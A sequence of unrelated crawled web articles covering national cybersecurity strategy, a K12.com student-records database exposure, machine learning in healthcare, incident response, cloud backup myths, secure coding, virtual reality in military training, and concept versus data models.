A well-planned and well-researched approach can help a government become more proactive in combating cybercrime. The components of a cybersecurity defense strategy differ from country to country, but all strategies share a few characteristics:
- A dedicated national infrastructure protection program
- A disaster response plan
- Effective cybercrime legislation
- A networked ecosystem for combating cyber threats

A national cybersecurity strategy is as crucial as a national military strategy: it improves a country's ability to defend itself and to prevent cybercrime.

The importance of information technology to all levels of government cannot be overstated, as many of the services they provide would not be possible without it. IT is now a fundamental element of government, and its significance will only grow in the future. Information technology is at the heart of the everyday activities of federal, state, and local government, and if the IT infrastructure were to fail, those governments would grind to a halt, unable to function on nearly any level. This is one of the reasons IT security is such a significant and essential industry today.
<urn:uuid:cb4800e8-806c-4bbe-9573-4e68de514e06>
CC-MAIN-2024-38
https://cybersguards.com/the-importance-of-cyber-technologies-in-government/
2024-09-20T04:56:45Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652130.6/warc/CC-MAIN-20240920022257-20240920052257-00124.warc.gz
en
0.93595
1,465
3.171875
3
A K12.com database containing almost 7 million student records was left open so that anyone with an internet connection could access it. On June 25, 2019, Comparitech and security researcher Bob Diachenko uncovered the exposure. The data leak involved a MongoDB instance that was made public. K12.com provides online education programs for students. This exposure affected its A+nyWhere Learning System (A+LS), which is used by more than 1,100 school districts.

What information was exposed?

The exposed database held almost 7 million (6,988,504) records containing students' data. The information held within each record included:
- Primary personal email address
- Full name
- School name
- Authentication keys for accessing A+LS accounts and presentations
- Other internal data

In this instance, an old version of MongoDB (2.6.4) was being used. This version of the database hasn't been supported since October 2016. What's more, the Remote Desktop Protocol (RDP) was enabled but not secured. As a result, the database was indexed by both the Shodan and BinaryEdge search engines, meaning the records it contained were visible to the public. We discovered the indexed data on June 25, but it had been public since June 23, and the database wasn't closed down until July 1. In all, the data leak lasted just over one week. It's unclear whether or not any malicious parties accessed the data during the exposure.

Diachenko was able to get in touch with K12 reps with the assistance of Dissent Doe, the administrator of Databreaches.net. K12 was very responsive and provided the following statement: "K12 takes data security very seriously. Whenever we are advised of a potential security issue, we investigate the problem immediately, and take the appropriate actions to remedy the situation."

Implications of exposed data

While the leak of this information isn't as bad as, for example, the exposure of financial data or Social Security numbers, it does have its implications. These pieces of information can be used to target individual students in spear phishing and account takeover fraud, and having their school name made public could potentially put students at risk of physical harm. If you or your child has used K12.com's A+LS, be on the lookout for things like login attempts on various accounts and phishing emails. Having an email address made public may also increase the volume of spam you receive.

K12.com provides online learning programs to individuals and schools, and it appears that this exposure only affected its A+LS software. Depending on the setup, students can access this system through a desktop client on home or school computers, or through the web both inside and outside of a school's network. Personal information such as name, email address, and date of birth is required for each student to create an account.

As far as we know, K12.com hasn't been involved in any other data leaks in the past. However, this isn't the first exposure affecting students in K-12 education and won't be the last. Indeed, there were 122 K-12 cybersecurity incidents in 2018, involving 119 education agencies. As schools increasingly use technology, cybersecurity will continue to be a growing concern.
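For context on how exposures like this are found, the sketch below shows the kind of check a researcher might run against a suspect MongoDB host: if an unauthenticated client can list databases, the instance is open to the world. The host is a placeholder, the check should only ever be run against systems you own or are authorized to test, and it assumes the pymongo driver is installed.

```python
# Minimal check for an openly accessible MongoDB instance.
# Placeholder host only -- run solely against systems you are authorized to test.
# Requires: pip install pymongo
from pymongo import MongoClient
from pymongo.errors import PyMongoError

HOST = "203.0.113.10"  # placeholder address, not a real server

try:
    # Short timeout so unreachable or filtered hosts fail fast.
    client = MongoClient(HOST, 27017, serverSelectionTimeoutMS=3000)
    names = client.list_database_names()  # succeeds only without authentication
    print("EXPOSED: unauthenticated access; databases:", names)
except PyMongoError as exc:
    print("Not openly accessible:", type(exc).__name__)
```

The standard hardening steps, binding MongoDB to private interfaces and enabling authentication (the net.bindIp and security.authorization settings in mongod.conf), would have prevented this kind of indexing by Shodan and BinaryEdge.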
<urn:uuid:74643696-4bb8-4d9a-8bbc-3d1cec4dc241>
CC-MAIN-2024-38
https://www.comparitech.com/blog/vpn-privacy/report-7-million-student-records-exposed-by-k12-com/
2024-09-20T04:23:49Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652130.6/warc/CC-MAIN-20240920022257-20240920052257-00124.warc.gz
en
0.958637
702
2.59375
3
Imagine a future in which technology not only helps but completely changes how we provide healthcare to patients. That's precisely what machine learning in healthcare is doing, bringing us closer to a future in which predictive algorithms and data-driven insights improve every facet of medical care. Once-futuristic concepts are becoming a reality because of this groundbreaking technology, which is changing how medical professionals diagnose, treat, and manage patients' health.

The impact of machine learning in healthcare is not just theoretical; impressive statistics back it up.
- A study by Accenture projects that AI applications could save the U.S. healthcare industry $150 billion annually by 2026.
- Furthermore, research from the National Institutes of Health reveals that machine-learning algorithms can detect breast cancer with accuracy levels comparable to human radiologists.

As we dive into the intricate world of machine learning, it's crucial to understand its growing influence on healthcare. So let's embark on this journey to see how ML is shaping the future of medicine.

Understanding Machine Learning in Healthcare

Machine learning, a subset of artificial intelligence, involves training algorithms to recognize patterns and make decisions based on vast amounts of data. Unlike traditional programming, where explicit instructions are provided, machine learning models learn from data inputs to improve their performance over time. In healthcare, this ability to learn and adapt is particularly valuable, as it allows for the analysis of complex datasets, leading to more accurate diagnoses and personalized treatments.

The relevance of machine learning in healthcare cannot be overstated. It offers innovative solutions that are reshaping patient care, from predicting disease outbreaks to personalizing medicine. Moreover, the role of healthcare AI extends beyond diagnostics and treatment planning: it is enhancing medical practice by streamlining administrative tasks, optimizing resource allocation, and even predicting patient admission rates. As a result, AI is driving a more efficient, patient-centered healthcare experience, promising better outcomes and improved quality of care.

Key Applications of Machine Learning in Healthcare

As machine learning continues to evolve, its applications in healthcare are becoming increasingly diverse and impactful. Let's look at some of them.

- Diagnosis and Prediction – Machine learning is transforming diagnosis and prediction, offering unprecedented accuracy and speed in early disease detection. By analyzing vast amounts of data, ML algorithms can identify subtle patterns that may indicate the onset of disease (a toy sketch of such a classifier appears just below). For example, Google's DeepMind has developed an algorithm capable of diagnosing eye diseases as accurately as leading experts, while IBM Watson has been used to predict diabetes risk by analyzing electronic health records.
- Personalized Medicine – Machine learning is also transforming personalized medicine by tailoring treatment plans to individual patient needs. Unlike traditional approaches that often rely on standardized protocols, ML models analyze a patient's genetic makeup, lifestyle, and medical history to recommend specific drug treatments. For instance, companies like Tempus leverage machine learning to customize cancer treatment plans, helping ensure patients receive the most effective therapies based on their unique profiles.
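Before moving on to the remaining applications, here is the toy illustration of the diagnostic use case, using scikit-learn's bundled breast cancer dataset. It is a teaching sketch, not any of the clinical systems named above, and the accuracy it prints says nothing about real-world clinical performance.

```python
# Toy diagnostic classifier on scikit-learn's bundled breast cancer dataset.
# A teaching sketch only -- not a clinical system. Requires: pip install scikit-learn
from sklearn.datasets import load_breast_cancer
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split

X, y = load_breast_cancer(return_X_y=True)  # 569 tumor samples, 30 features each
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.25, random_state=42, stratify=y)

model = RandomForestClassifier(n_estimators=200, random_state=42)
model.fit(X_train, y_train)  # learn patterns separating benign from malignant

preds = model.predict(X_test)
print(f"Held-out accuracy: {accuracy_score(y_test, preds):.3f}")
```

With that illustration in hand, let's continue with the remaining applications.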
- Medical Imaging Analysis
Machine learning is also enhancing medical imaging analysis, leading to more accurate interpretations of MRI and CT scans. Traditional imaging workflows can be time-consuming and subject to human error. ML algorithms, however, improve image resolution and highlight abnormalities that might be missed by the human eye. For example, Google's AI has been shown to outperform radiologists in detecting lung cancer from CT scans. This increased accuracy not only assists radiologists but also accelerates diagnosis, facilitating quicker and more informed treatment decisions.
- Patient Monitoring and Care Management
Furthermore, machine learning in healthcare is pivotal in patient monitoring and care management, especially for chronic diseases. With the advent of wearable devices, real-time data collection has become a reality, allowing continuous monitoring of patient vitals such as heart rate, blood pressure, and glucose levels. For instance, companies like Fitbit and Apple are integrating machine learning algorithms into their devices to provide insights into patient health trends and predict potential issues before they escalate.
Benefits of Machine Learning in Healthcare
Now that we know the key applications of machine learning in healthcare, it is time to look at its benefits:
- Improved Accuracy and Efficiency
One of the most significant benefits of machine learning in healthcare is the improvement in accuracy and efficiency. Machine learning algorithms can analyze complex datasets faster and more accurately than their human counterparts, reducing both diagnostic errors and administrative burdens. For instance, ML systems can quickly sift through medical records to identify potential risk factors and recommend appropriate interventions, freeing healthcare professionals to focus more on patient care than on administrative tasks.
- Enhanced Patient Outcomes
Moreover, machine learning in healthcare has been shown to enhance patient outcomes by enabling more effective treatment strategies. By leveraging ML algorithms, healthcare providers can tailor treatment plans to individual patient needs, thereby improving the likelihood of successful outcomes. Numerous case studies illustrate how machine learning has improved treatment effectiveness, particularly in oncology. Consequently, patients benefit from more targeted and efficient care, reducing recovery times and improving overall health outcomes.
- Cost Reduction
Furthermore, machine learning can significantly reduce healthcare costs by optimizing resource use. By predicting patient needs and streamlining operations, ML systems help healthcare providers allocate resources more efficiently, leading to cost savings. For example, predictive analytics can anticipate patient admission rates, enabling hospitals to optimize staffing and inventory management. Additionally, by reducing diagnostic errors and minimizing unnecessary tests, machine learning in healthcare lowers the costs associated with misdiagnoses and redundant procedures.
Challenges and Limitations
For all its benefits, machine learning in healthcare also faces real challenges. Here are some of them:
- Data Privacy and Security
One of the primary challenges facing machine learning in healthcare is data privacy and security. Because ML algorithms rely on vast amounts of patient data to generate insights, ensuring the protection of this sensitive information is paramount.
Furthermore, concerns regarding patient data protection have intensified, particularly with the increasing number of cyberattacks targeting healthcare systems. Additionally, regulatory requirements such as HIPAA in the United States impose strict guidelines on data handling and privacy.
- Integration with Existing Systems
Another significant challenge is integrating machine learning solutions into existing healthcare infrastructure. Many healthcare systems rely on outdated technologies and legacy systems, making it difficult to incorporate advanced ML models seamlessly. Additionally, compatibility issues and a lack of standardized data formats often hinder the successful implementation of machine learning in healthcare settings. As a result, healthcare organizations must invest in upgrading their IT infrastructure and training personnel to manage and integrate these advanced technologies.
- Bias and Fairness
Bias and fairness also present critical challenges in deploying machine learning in healthcare. ML models are only as good as the data they are trained on; biased or unrepresentative datasets can lead to skewed predictions. Addressing potential biases in ML models is essential to ensure equitable healthcare outcomes for all patients, regardless of their background or demographic characteristics. To mitigate these issues, developers and healthcare providers must implement rigorous testing and validation processes.
How advansappz Helps You Navigate the Challenges
In the rapidly evolving landscape of healthcare technology, advansappz stands out as a trusted partner in helping organizations harness the full potential of machine learning. As an innovative IT company, advansappz specializes in providing comprehensive solutions tailored to the unique needs of the healthcare industry.
- Ensuring Data Privacy and Security
advansappz places a strong emphasis on data privacy and cybersecurity, recognizing the critical importance of protecting sensitive patient information. By implementing state-of-the-art security protocols and encryption technologies, advansappz ensures that your data is safeguarded against unauthorized access and cyber threats. Moreover, our team of experts is well-versed in regulatory compliance, helping healthcare providers navigate complex regulations such as HIPAA. Consequently, you can trust advansappz to deliver machine-learning solutions that prioritize data protection and maintain patient confidentiality.
- Seamless Integration with Existing Systems
One of the key strengths of advansappz is our ability to integrate machine learning solutions seamlessly into your existing healthcare infrastructure. We understand that compatibility issues can pose significant challenges, which is why we offer customized integration services. Our team works closely with your IT staff to ensure smooth implementation and minimal disruption to your operations. As a result, you can leverage the power of machine learning in healthcare without the headaches associated with system integration.
- Addressing Bias and Ensuring Fairness
advansappz is committed to promoting fairness and transparency in machine learning applications. We employ advanced techniques to detect and mitigate biases in ML models, ensuring that all patients receive equitable treatment recommendations. Moreover, our rigorous testing and validation processes help identify potential biases, allowing us to refine algorithms and improve their accuracy. A minimal illustration of the kind of per-group check involved follows below.
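As a rough illustration of the bias testing described above, here is a toy sketch that compares model accuracy across demographic groups. The data and the accuracy-only metric are our own simplifying assumptions; real fairness audits use multiple metrics (calibration, false-negative rates, and more).

```python
import numpy as np

def per_group_accuracy(y_true, y_pred, groups):
    """Accuracy per demographic group; a large gap between groups
    suggests skewed training data or a model that needs rework."""
    return {
        g: float((y_true[groups == g] == y_pred[groups == g]).mean())
        for g in np.unique(groups)
    }

# Tiny made-up example: perfect on group "a", poor on group "b".
y_true = np.array([1, 0, 1, 0, 1, 0])
y_pred = np.array([1, 0, 1, 1, 0, 1])
groups = np.array(["a", "a", "a", "b", "b", "b"])
print(per_group_accuracy(y_true, y_pred, groups))  # {'a': 1.0, 'b': 0.0}
```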
By partnering with advansappz, you can trust that your machine-learning initiatives will be ethical, fair, and aligned with the highest standards of patient care.
Machine learning in healthcare is revolutionizing the way medical professionals diagnose, treat, and manage patient care, offering a future where precision and personalization are at the forefront. From improving accuracy in diagnostics to enabling personalized treatment plans, the benefits of machine learning are profound and far-reaching. However, the journey to fully integrating these technologies into healthcare systems comes with its share of challenges, including data privacy concerns, integration issues, and potential biases in algorithms. Organizations like advansappz play a crucial role in helping healthcare providers navigate these challenges and empower them to harness the full potential of these technologies. Contact advansappz to learn more.
1. What are the main types of machine learning algorithms used in healthcare?
Machine learning in healthcare utilizes various algorithms, including supervised learning for disease prediction, unsupervised learning for patient clustering, and reinforcement learning for personalized treatment plans.
2. How can machine learning improve patient-doctor interactions?
Machine learning in healthcare can enhance patient-doctor interactions by providing doctors with data-driven insights and recommendations, allowing physicians to make more informed decisions.
3. What role does machine learning play in drug discovery?
Machine learning in healthcare accelerates drug discovery by analyzing vast datasets to identify potential drug candidates and predict their effectiveness. Moreover, by reducing the time and cost associated with traditional drug development processes, ML helps bring new treatments to market more quickly.
4. How does machine learning address the shortage of healthcare professionals?
Machine learning in healthcare helps address the shortage of healthcare professionals by automating routine tasks, optimizing workflow efficiency, and enabling remote patient monitoring.
5. What are the future trends of machine learning in healthcare?
The future of machine learning in healthcare includes advancements in predictive analytics, real-time data integration, and the development of AI-driven diagnostic tools. As these technologies evolve, they promise to further improve patient outcomes and transform healthcare delivery.
A Cyber Incident Response (IR) plan is the organized approach an organization takes to address and manage the repercussions of a cyberattack or incident. Such an incident can be any event that leads to disruption or loss of an organization's services, functions, or operations. Essentially, IR is the process of detecting a cyberattack, then taking the proper steps to evaluate and clean up what has happened. The overarching goal of an IR plan is to reduce damage and recovery time. When it comes to cybersecurity and an IR plan, it's all about planning ahead and having a plan of attack before it is actually necessary. Rather than being an IT-centric process, IR is an overall business function that helps ensure your organization can make quick decisions based on dependable information. Oftentimes, IT security staff is involved, as well as representatives from other core areas of the organization, such as HR and Comms. So, let's take a deeper look at Cyber Incident Response. In this 3-part blog series, we'll take a deep dive into IR and cover:
• Cyber IR: Why you need it
• Building your IR team
• Creating an IR Plan
By the time we get to the last blog, you'll have learned some actionable IR strategies! Learn more about IR and how DomainTools can help keep your information safe.
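To give the detect-evaluate-clean-up flow above a concrete shape, here is a toy sketch of an incident moving through response phases. The phase names follow the common NIST-style lifecycle and are our own illustrative assumption, not anything prescribed by this post or by DomainTools.

```python
from enum import Enum, auto

class Phase(Enum):
    DETECT = auto()
    ASSESS = auto()
    CONTAIN = auto()
    ERADICATE = auto()
    RECOVER = auto()
    REVIEW = auto()

# An incident normally moves forward through the plan, but new
# findings during recovery can send it back to containment.
ALLOWED = {
    Phase.DETECT: {Phase.ASSESS},
    Phase.ASSESS: {Phase.CONTAIN},
    Phase.CONTAIN: {Phase.ERADICATE},
    Phase.ERADICATE: {Phase.RECOVER},
    Phase.RECOVER: {Phase.REVIEW, Phase.CONTAIN},
    Phase.REVIEW: set(),
}

def advance(current: Phase, nxt: Phase) -> Phase:
    """Move an incident to its next phase, enforcing the plan."""
    if nxt not in ALLOWED[current]:
        raise ValueError(f"{current.name} -> {nxt.name} is not in the plan")
    return nxt
```

Encoding the plan this way enforces the "plan ahead" discipline the post calls for: any step outside the agreed playbook fails loudly instead of happening ad hoc.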
Organizations worldwide are making the move to the cloud, and that means more of their data lives there than ever before. Yet many of these businesses pursue the cloud with misconceptions about their data protection needs. Let's look at some of those myths:
Many organizations believe that the cloud is inherently safe and that, as a result, there is no need to implement effective data backup and recovery. But cloud data security is a shared responsibility between the cloud provider and the customer. The responsibility of the cloud provider is to safeguard the infrastructure, ensure access, and configure physical hosts, storage, and other resources. In short: to ensure the underlying infrastructure is available. The responsibilities of the customer are to manage users and their access privileges, safeguard cloud accounts from unauthorized access, encrypt and protect cloud-based data assets, and manage compliance [1]. As a result, it is up to the customer to ensure an effective backup and recovery solution is in place so that the data itself is available. Otherwise, cloud data is subject to malicious threats as well as unintentional deletions, impacting key workloads across the IT environment.
[1] "Shared Responsibility Model Explained." Cloud Security Alliance, 26 Aug. 2020, https://cloudsecurityalliance.org/blog/2020/08/26/shared-responsibility-model-explained.
Cloud providers have developed native tools for basic retention and backup functions. However, adopting and relying on these solutions can create several challenges. First, they often have default retention periods (e.g., 30 days for M365) that fall far short of enterprise requirements. They can also be complex to use when modifying defaults, and typical recovery times may fall short of SLA requirements, particularly at scale. These native services are also siloed, in the sense that they are not designed to protect data sources beyond those they host, i.e., those running on-premises or in other clouds. As a result, organizations often end up with multiple systems to manage when using such tools, which drives up complexity and costs, creates a broader attack surface for security risks and breaches, and poses challenges in meeting business SLAs and compliance requirements.
Many believe that recovery of cloud data is quick and seamless. Yet, as many have come to realize, both backup and recovery speed in the cloud are highly network dependent. As a result, there is no guarantee that there won't be lag or latency in data recovery, which can have a significant impact on businesses with tight Recovery Time Objectives (RTOs). This is why a hybrid solution that can be managed from one place and that provides both self-managed and SaaS options is paramount. This way, you can choose where cloud backup data resides in order to meet SLA expectations properly when it comes to restores. Having that solution also be optimized for network performance, transmitting only delta change blocks across the WAN, is important as well.
Backup remains critical to business operations, and organizations need to be aware of their responsibilities when storing data in the cloud. To solve many of these challenges, Cohesity offers a choice of consumption models for data backup and recovery. With Cohesity DataProtect, organizations can take advantage of an on-premises backup solution which is self-managed, or of Backup as a Service (BaaS), which can extend to cloud-native and SaaS workloads.
With Cohesity DataProtect delivered as a service, organizations can simplify backup with a service that's optimized for a true hybrid experience, from data center to cloud to edge environments, all while using a simple, unified UI and capacity-based pricing. As you can see, we've got you covered when it comes to protecting your cloud data sources.
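To illustrate the "delta change blocks" idea mentioned above, here is a generic sketch of fixed-size block diffing. This is our own simplified illustration, not Cohesity's actual implementation, and the 4 MiB block size is an arbitrary assumption.

```python
import hashlib

BLOCK_SIZE = 4 * 1024 * 1024  # 4 MiB per block (illustrative choice)

def block_digests(path: str) -> list[bytes]:
    """Hash a file in fixed-size blocks."""
    digests = []
    with open(path, "rb") as f:
        while block := f.read(BLOCK_SIZE):
            digests.append(hashlib.sha256(block).digest())
    return digests

def changed_blocks(old: list[bytes], new: list[bytes]) -> list[int]:
    """Indices of blocks that must cross the WAN; the rest are reused."""
    return [i for i, d in enumerate(new)
            if i >= len(old) or old[i] != d]
```

Sending only the changed blocks is what keeps backup windows short on constrained WAN links, which is exactly where the RTO concerns above bite hardest.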
With software being central to today's interconnected world, making it secure has become more crucial than ever. Fortunately, decreasing cyber risks and achieving more secure applications is well within reach of any company developing software: they should simply write the code with security in mind.
To grasp the concept of secure coding, let's first explore what source code is all about. Source code consists of instructions that determine how an application should work, behave, and operate. It serves as the foundational blueprint, detailing operational procedures and responses to various inputs. Initially written in a human-readable form that we call a programming language, the source code is translated into machine-readable instructions: the binary code that computers understand and execute.
Secure coding is about writing the source code in a way that protects applications from vulnerabilities and potential threats. This means using specific coding techniques and adhering to coding best practices to mitigate security risks, safeguard against data breaches, prevent unauthorized access, or make malicious code execution hard. It covers both writing the source code securely and maintaining any third-party libraries in a secure state. Simply put, the goal is to have an application that does well what it should do, but that doesn't do anything that it shouldn't.
By prioritizing secure coding principles, developers aim to create applications that are resilient and robust against malicious attacks. This proactive approach ensures optimal performance without compromising sensitive data or exposing vulnerabilities. Indeed, these weaknesses can lead to substantial reputational risks and financial losses, sometimes reaching millions, as evidenced in notable cases like Heartbleed, Log4Shell, or the Microsoft Exchange breach. Security incidents often originate within an application's software and codebase, underscoring the critical need for robust secure coding practices to establish a solid foundation for software security.
To effectively adopt secure programming, developers should adhere to coding best practices. Here are some key basic practices that should be implemented.
Implement robust authentication and authorization mechanisms alongside standard encryption algorithms to protect data in transit and at rest. Don't hardcode sensitive information such as passwords or access keys directly into your code or the code repository; instead, use the available secrets-management tools in your applications.
Obviously, you cannot prepare your code to work well for all possible inputs. At the same time, inputs are the ultimate channels through which attackers will feed in something unexpected that your code is not prepared for. And that's exactly where input validation comes into the picture: just reject anything your code may misbehave on and accept only those values you are sure your code is OK with. And remember, the default behavior is to reject; so always apply allowlists for input validation, do not use denylists.
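As a minimal illustration of the allowlist principle just described, here is a sketch in Python. The username format is an assumed example policy, not a universal rule.

```python
import re

# Allowlist: accept only values we know the code handles correctly;
# everything else is rejected by default.
USERNAME_PATTERN = re.compile(r"[a-z][a-z0-9_]{2,31}")

def validate_username(raw: str) -> str:
    if not USERNAME_PATTERN.fullmatch(raw):
        raise ValueError("username rejected: not on the allowlist")
    return raw

validate_username("alice_01")  # accepted
# validate_username("alice; rm -rf /") would raise ValueError
```

Note the direction of the check: the pattern describes what is allowed, and anything that fails to match is refused. That is the allowlist-over-denylist stance the text argues for.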
Third party components and libraries – regardless of being commercial tools or open-source – can save time but are also common entry points for vulnerabilities. If you have a vulnerability in these, it is not your fault, but it is still your problem! Avoid using components with known vulnerabilities: keep your dependencies up to date at all times and continuously monitor vulnerability feeds, since new vulnerabilities pop up literally on a daily basis.
Combining regular secure code reviews and automated scanning tools can prevent many types of attacks, like Cross-site scripting (XSS) and SQL injection, just to name a few (XSS runs malicious code under your domain, while SQL injection steals or manipulates your internal data; see the parameterized-query sketch below). Detecting the usage of vulnerable components is also a step you can easily automate these days. There are of course some types of vulnerabilities these tools cannot find, but the bulk of the problems are of a nature they can find and pinpoint for you!
Integrating secure coding practices across the Software Development Life Cycle (SDLC) is crucial to effectively address vulnerabilities. By embracing a "shift left" approach, some of the security-relevant activities are moved from later stages to the beginning of the SDLC. This ensures that security measures are implemented from initial requirements gathering and coding through testing, deployment, and ongoing maintenance. Remember: the earlier you realize a problem, the cheaper it is to fix it!
Most importantly, securing your applications should start with fostering a robust security culture within the organization. This involves educating developers, IT teams, management, and all stakeholders on best practices and proactive threat management. Many SDLC schemes, like Microsoft's Security Development Lifecycle (SDL) or SAMM, also recognize this. The bottom line is: train your developers to fix the (in)security of your application at its core – the developer's mindset!
Security testing involves identifying and fixing potential vulnerabilities in your code before they get to production. It's not about how the system should work – that's functional testing. It's about how the system should NOT work. Security testing can be done manually or with automated tools, but the best approach is to blend the two.
A secure development framework ensures that code is developed, tested, and deployed in a way that minimizes the risk of introducing vulnerabilities. It includes secure infrastructure, tools, and practices that collectively enhance the security of the whole software development lifecycle.
OWASP secure coding refers to a collection of best practices, guidelines, and cheat sheets provided by the Open Worldwide Application Security Project. These resources outline general software security principles and specific coding requirements to help developers write secure code. OWASP is not just the Top Ten, after all!
Yes, there are many others. Some guidelines are created for specific programming languages, like the SEI CERT C, C++, or Java secure coding guidelines. Others are created for specific lines of business, like MISRA for automotive and transportation, or PCI DSS for banking and financial services. And there are databases of vulnerabilities from which one can also learn a lot, like the Common Weakness Enumeration (CWE) or the Fortify Taxonomy.
Secure coding protects businesses from financial losses, reputational damage, and legal consequences by preventing data breaches and other security incidents. It helps maintain customer trust and at the same time ensures compliance with regulatory requirements.
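To ground the SQL injection point made earlier, here is a minimal parameterized-query sketch. It uses Python's built-in sqlite3 module purely for illustration; the table and column names are made up.

```python
import sqlite3

def find_user(conn: sqlite3.Connection, username: str):
    # The `?` placeholder makes the driver treat `username` strictly
    # as data, never as SQL text, so crafted input such as
    # "x' OR '1'='1" cannot rewrite the query.
    cur = conn.execute(
        "SELECT id, email FROM users WHERE name = ?",
        (username,),
    )
    return cur.fetchone()
```

String concatenation into SQL is the anti-pattern here; parameterization is the simplest fix, and every mainstream database driver supports it.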
In conclusion, incorporating secure coding practices is essential for any organization developing applications in order to mitigate risks and protect software from cyber threats. By implementing these key practices, developers establish a robust foundation to ensure the integrity of applications throughout their lifecycle. Cydrill’s award-winning training program offers a blended learning journey for software engineers to ensure they are well-prepared for secure coding. With its gamified environment and content, Cydrill empowers developers to take the lead in securing our digital future.
Militaries of all kinds – air, sea, and land – have long used virtual reality, given its versatility. It is primarily used in battlefield training to prepare soldiers for real-time scenarios in every respect. Let's have a look at what virtual reality is:
What is Virtual Reality?
Virtual reality can seem like a paradox, but it can be understood as the generation of a virtual world and animations that can be operated from the real world as if we were part of that virtual space. Technically, the term virtual reality refers to the use of computerized technology and devices to create virtual simulations. These place viewers inside the setting so that they not only see the image but feel it happening right in front of their eyes, much as in 3D techniques, which are themselves an aspect of virtual reality. Equipped with the required devices, users can rely on their senses to look around, move up and down, and see everything as if they were really part of a virtual world.
Currently, virtual reality is used in many forms: in entertainment, in gaming, in education, and in medical and military training as well. The most common example for understanding virtual reality is a 3D movie: with special glasses, viewers can see the entire scene as if it were happening right in front of their eyes. Lighting and sound effects are likewise used to reinforce the feeling that events are unfolding right before us, even though none of it is real.
Technological advances play an important role in experiencing the VR world. For instance, there are headsets that users wear while playing games of this sort (tennis being among the most popular), designed to make them believe they are on a tennis court: however they move, their character in the game moves too.
Have a look at our blog on Extended Reality
Hence, it can be said that with the help of these devices and animation, the required uses can be realized. Coming back to the military sector: the military's sole purpose here is to train soldiers harmlessly using such virtually real techniques, which serves both ways – it is harmless, and it still offers realistic preparation.
Role of Virtual Reality in Military
Let's have a look at how the various branches of the military use virtual reality:
1. Air Force
The Air Force mainly uses virtual reality for flight simulations, training all kinds of pilots according to their specializations. The training covers everything from flying skills to dealing with emergencies and communicating with ground control, all of it virtual. Trainees are provided with prototypes of aircraft and fighter planes so they can try their hand safely. The replica devices work just like a real aircraft setup, able to tilt, move, or twist to mimic the movements of an aircraft, so that trainees experience practical conditions before entering the real combat sphere of warfare and the skies. They see everything they might see in a real scenario on one or multiple monitors and screens, giving them an all-round view of the sky.
This makes them understand the pressure and the real-time consequences of their mistakes, with practical reinforcement during training, so that they can build toward perfection over time.
2. Navy
The Navy makes full use of virtual reality to teach the operation of submarines and to generate a realistic underwater experience during training, so that trainees can go on to work with real-time equipment. The Navy primarily uses it to teach the complex workings of submarines and warships, providing a good way to teach steering, navigation, and general ship handling, and to train new seamen in dealing with real-time emergencies as well as the necessary communications. The training also focuses on recreating operational details such as ground-control communication, temperature changes, and motion controls. The most interesting feature of the Navy's use of virtual reality, however, is that the submarine replica does not have monitor screens; trainees rely on instrument readings to track the position of the submarine in the water.
3. Army
The Army uses VR headsets and devices to create simulations of military situations and operations. With the help of such devices, the illusion of a jungle, icy hills, or whatever terrain is required can be created, helping soldiers train by working through how they would deal with the same scenario in the real world and compelling them to feel part of the scene. This is often done with connected VR headsets and eyewear, along with replicas of the devices they would use, such as guns and knives; in some cases they are given objects matching the weights they would carry in wartime, to build ever greater precision. Their bodies are connected to a tracking system that helps plot their movements, which are shown to them via a virtual screen.
Recommended blog - Augmented Reality
Here, however, the aim is to teach the unit to work as a team in a predetermined, guided way, so that they can encounter a scene and act accordingly. The main goal is not just to teach replicas of real situations but to teach soldiers how to operate as a team and make the most of the combat situation they encounter. Apart from this, there is another significant kind of training required in the military sector: battlefield medical training.
4. Battlefield Medical Training
To maintain soldiers' medical well-being after a traumatizing event, virtual reality training can be used to treat PTSD (Post-Traumatic Stress Disorder). This is done with a virtual tool that gives them a relatively calmer replay of what they experienced during the stressful situation, helps them react the way they wanted to, and offers a less fearful, controlled version of events, gradually keeping their stress in check. Virtual training is also important medically in the form of rescue camps: virtual situations are created to train soldiers for treatable on-field emergencies and first aid, using preset monitors and devices on which trainees work through the projected emergency. And since military training is harsh and draining, and can initially be emotionally stressful for some, boot camps can be set up to make recruits aware of real-time training and prepare them for it.
Recruits can train for harsh scenarios in a safe space equipped with a mounted display, motion trackers, and wireless virtual weapons, learning to operate them safely. Although no amount of virtual training can be an alternative to real-time training, and no amount of making something virtual seem real can replace the real thing, there are still several advantages to using virtual reality in the military.
Advantages of VR in Military
1. Saves Money and Resources
Using virtual devices is far easier on the military budget than using real equipment, even for basic teaching. Training can happen without commuting to a battlefield and without setting up dedicated training vehicles, ships, or weapons. Virtual weapons save money by enabling reuse and repeated training without wasting anything, so no extra money is spent per trainee. This conserves both money and resources, which can be used elsewhere.
2. Safe and Convenient Learning
The technical devices are far more convenient and easier to operate than the original equipment. This not only provides a smoother version of the devices for learning but also leaves room for making mistakes and learning from them. Virtual reality tools also let trainees practice in a safe environment without feeling intimidated by the next such encounter.
3. Prevents Disasters
Loss of life during training is a real possibility in the case of an accident, whether while learning to operate devices or from operating them the wrong way. When training takes place virtually, there is comparatively less room for such accidents, and trainees can be prepared harmlessly for the real-time experience before real combat or live training, making VR an effective tool for the military.
Recommended blog - IoT in Disaster Management
Being in the military is not just a matter of patriotism; it also demands perfection and responsibility in the face of inevitable and frequent disasters. Virtual reality can never replace real training in such a field, it's true, but it is because of virtual reality that better avenues of learning are now operational for trainees in the army, navy, and air force, helping them become efficient in their work. The military was one of the first sectors to adopt virtual reality as part and parcel of its training, and it continues to use it today. Ongoing upgrades to hardware replicas, to software, and to level-specific training visuals are required, and keeping these current is what keeps military use of VR significant.
Concept Models vs. Data Models

Concept models are a core technique mandated by the Business Agility Manifesto. Let's be very clear what a concept model is not. A concept model is not a data model. The focus of the two kinds of model is altogether different.
- A data model is aimed at how you best organize data for storage in a system. A good one will start by trying to reflect the entities that exist in the real world, so the model is not skewed to a particular use or application.
- A concept model, in contrast, is aimed at disambiguation of the things people say and write. Such communications can include requirements for system design but, much more importantly, things like business policies, regulations, agreements, notices (etc.) that may be far removed from system design activity. In other words, a concept model is a technique for improving business communication across the board. A capacity for disambiguation can obviously assist system design, but it's not about system design.

To appreciate the need for a concept model, first you must appreciate that business communication is often replete with ambiguity — full of semantic potholes. If you've never been burned by miscommunication, then you'll never really appreciate the need for a concept model. You can stop reading here. But of course we've all been victimized in that respect!

The Real World Test

